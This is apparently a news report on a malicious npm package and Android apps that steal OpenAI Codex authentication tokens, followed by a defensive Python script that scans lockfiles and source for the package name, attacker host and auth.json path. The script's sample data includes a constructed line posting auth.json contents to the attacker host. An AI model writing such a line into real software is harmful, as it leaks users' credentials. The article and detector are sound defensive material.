OpenAI Codex Tokens Stolen in Malicious npm Package; Over 29,000 Users at Risk

OpenAI Codex Authentication Tokens Compromised in Malicious npm Package Attack

Cybersecurity researchers have uncovered a sophisticated supply chain attack targeting developers utilizing OpenAI’s Codex through a seemingly legitimate remote web interface. The malicious tool, named `codexui-android`, is promoted on GitHub and npm as a remote web UI for OpenAI Codex, boasting over 29,000 weekly downloads. Notably, the package remains available for download from the repository.

Unlike traditional attacks that rely on typosquatting or deceptive packages to mislead developers, this campaign embeds malicious code into a functional npm package that has undergone active development. The associated GitHub repository appears clean, further enhancing the illusion of legitimacy.

Aikido Security researcher Charlie Eriksen highlighted the severity of the situation, stating, “For the past month, every single invocation has been quietly exfiltrating your Codex authentication tokens to an attacker-controlled server.” The malicious alterations were introduced approximately a month after the package’s initial publication, likely to build user trust and expand its reach. The npm account linked to the package is friuns (also known as Igor Levochkin).

Embedded within the package is code designed to extract the contents of Codex’s `~/.codex/auth.json` file and transmit them to a remote server (`sentry.anyclaw[.]store`) masquerading as Sentry, a legitimate application monitoring and error tracking platform. The exfiltrated data includes:

– Access token
– Refresh token
– ID token
– Account ID

Eriksen emphasized the persistent threat posed by the stolen refresh token, noting, “The refresh_token doesn’t expire. An attacker holding it can silently impersonate you indefinitely. A stolen Codex refresh_token goes beyond access to a chat interface—it’s persistent, silent access to whatever that account can do.”

It’s important to note that each time a user logs into the Codex app, CLI, or IDE Extension using either ChatGPT or an API key, the login details are cached locally in a plaintext file at `~/.codex/auth.json` or in the operating system-specific credential store. OpenAI advises developers to treat this file with the same caution as a password, warning, “Don’t commit it, paste it into tickets, or share it in chat.”

Intriguingly, the npm package is not the sole delivery vector employed by the threat actor to target Codex developers. Aikido observed an Android application named OpenClaw Codex Claude AI Agent (package name: `gptos.intelligence.assistant`) that runs the npm package within its PRoot sandbox and sends the Codex credentials to the same endpoint.

The Android application, developed by an entity named BrutalStrike, has amassed over 50,000 downloads. The same exfiltration mechanism has been identified in a second Android app linked to BrutalStrike: Codex (package name: `codex.app`), which has been downloaded over 10,000 times. The remaining three apps offered by the developer do not contain the malicious functionality.

This incident underscores the critical importance of vigilance when integrating third-party packages and applications into development workflows. Developers are urged to:

– Regularly audit and verify the integrity of third-party packages.
– Monitor for unusual network activity that may indicate data exfiltration.
– Implement robust security measures to protect authentication tokens and other sensitive information.

By adopting these practices, developers can mitigate the risks associated with supply chain attacks and safeguard their projects against unauthorized access and data breaches.
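
As an added example (not code from the article or from Aikido's research), the Python script below audits a project for the indicators named above: the `codexui-android` package in a `package-lock.json`, and installed source text that references the exfiltration host or the Codex `auth.json` path. Flagging every version of the package is an assumption, since the article does not list affected versions; the function names and the sample lockfile and source text are constructed.

```python
import json
import re

# Indicators from the article; the host is kept defanged and re-fanged for matching.
BAD_PACKAGE = "codexui-android"
EXFIL_HOST = "sentry.anyclaw[.]store".replace("[.]", ".")
TOKEN_FILE = re.compile(r"\.codex[/\\]+auth\.json")

def locked_packages(lock):
    """Yield (name, version) for each entry of a parsed package-lock.json.

    Covers lockfileVersion 2/3 ("packages", keyed by install path) and
    lockfileVersion 1 ("dependencies", nested recursively).
    """
    for path, meta in lock.get("packages", {}).items():
        if path:  # the "" key is the root project itself
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            yield name, meta.get("version")
    stack = [lock.get("dependencies", {})]
    while stack:
        for name, meta in stack.pop().items():
            yield name, meta.get("version")
            stack.append(meta.get("dependencies", {}))

def audit(lock, sources=None):
    """Return sorted findings for a lockfile dict and a {path: text} mapping."""
    findings = set()  # a set, because v2 lockfiles list each package twice
    for name, version in locked_packages(lock):
        if name == BAD_PACKAGE:
            findings.add(f"lockfile: {name}@{version}")
    for path, text in (sources or {}).items():
        if EXFIL_HOST in text:
            findings.add(f"{path}: references {EXFIL_HOST}")
        if TOKEN_FILE.search(text):
            findings.add(f"{path}: reads Codex auth.json")
    return sorted(findings)

# Constructed sample input (not real package contents or versions).
SAMPLE_LOCK = json.loads("""{
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "my-app"},
    "node_modules/express": {"version": "4.19.2"},
    "node_modules/tooling/node_modules/codexui-android": {"version": "0.0.0-sample"}
  }
}""")
SAMPLE_SOURCES = {"dist/cli.js": f"post('https://{EXFIL_HOST}/x', read('~/.codex/auth.json'))"}

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_LOCK, SAMPLE_SOURCES)))
```

A match on the `auth.json` path alone is only a lead, because legitimate Codex tooling reads that file too; a hit on the package name or host means the tokens in `~/.codex/auth.json` should be treated as exposed.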